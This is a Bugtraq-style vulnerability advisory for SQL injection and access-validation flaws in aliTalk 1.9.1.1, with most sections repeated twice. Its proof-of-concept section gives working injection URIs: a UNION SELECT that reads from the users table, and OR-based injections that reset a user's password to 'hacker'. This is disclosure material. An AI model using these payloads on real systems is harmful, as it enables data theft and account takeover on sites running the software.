aliTalk Multiple SQL Injection And Access Validation Vulnerabilties
BID:27315
Info
aliTalk Multiple SQL Injection And Access Validation Vulnerabilties
| Bugtraq ID: | 27315 |
| Class: | Unknown |
| CVE: |
CVE-2008-0391 CVE-2008-0371 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 16 2008 12:00AM |
| Updated: | Jul 05 2016 10:00PM |
| Credit: | tomplixsee is credited with the discovery of these issues. |
| Vulnerable: |
AlilG aliTalk 1.1.9 .1 |
| Not Vulnerable: | |
Discussion
aliTalk Multiple SQL Injection And Access Validation Vulnerabilties
aliTalk is prone to multiple SQL-injection vulnerabilities and an access-validation issue because it fails to adequately sanitize user supplied input.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
aliTalk 1.9.1.1 is vulnerable; other versions may also be affected.
aliTalk is prone to multiple SQL-injection vulnerabilities and an access-validation issue because it fails to adequately sanitize user supplied input.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
aliTalk 1.9.1.1 is vulnerable; other versions may also be affected.
Exploit / POC
aliTalk Multiple SQL Injection And Access Validation Vulnerabilties
Attackers can exploit these issues using a browser.
The following example URIs are avaialble:
http://www.example.com/alitalk/inc/receivertwo.php?uid=1&mohit=y'+union+select+user(),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2+from+alitalk_users+where+uid='1&turnadd=1&melody=0&lilil=400
http://www.example.com/inc/usercp.php?action=newpass&id=1' or password='&lilil=400&new=hacker
http://www.example.com/inc/usercp.php?action=newpass&id=1' or 1='1&lilil=400&new=hacker
http://www.example.com/inc/elementz.php?lilil=400&ubild=hacker&pa=hacker
Attackers can exploit these issues using a browser.
The following example URIs are avaialble:
http://www.example.com/alitalk/inc/receivertwo.php?uid=1&mohit=y'+union+select+user(),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2+from+alitalk_users+where+uid='1&turnadd=1&melody=0&lilil=400
http://www.example.com/inc/usercp.php?action=newpass&id=1' or password='&lilil=400&new=hacker
http://www.example.com/inc/usercp.php?action=newpass&id=1' or 1='1&lilil=400&new=hacker
http://www.example.com/inc/elementz.php?lilil=400&ubild=hacker&pa=hacker
Solution / Fix
aliTalk Multiple SQL Injection And Access Validation Vulnerabilties
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
aliTalk Multiple SQL Injection And Access Validation Vulnerabilties
References:
References:
- Vendor Homepage (AlilG)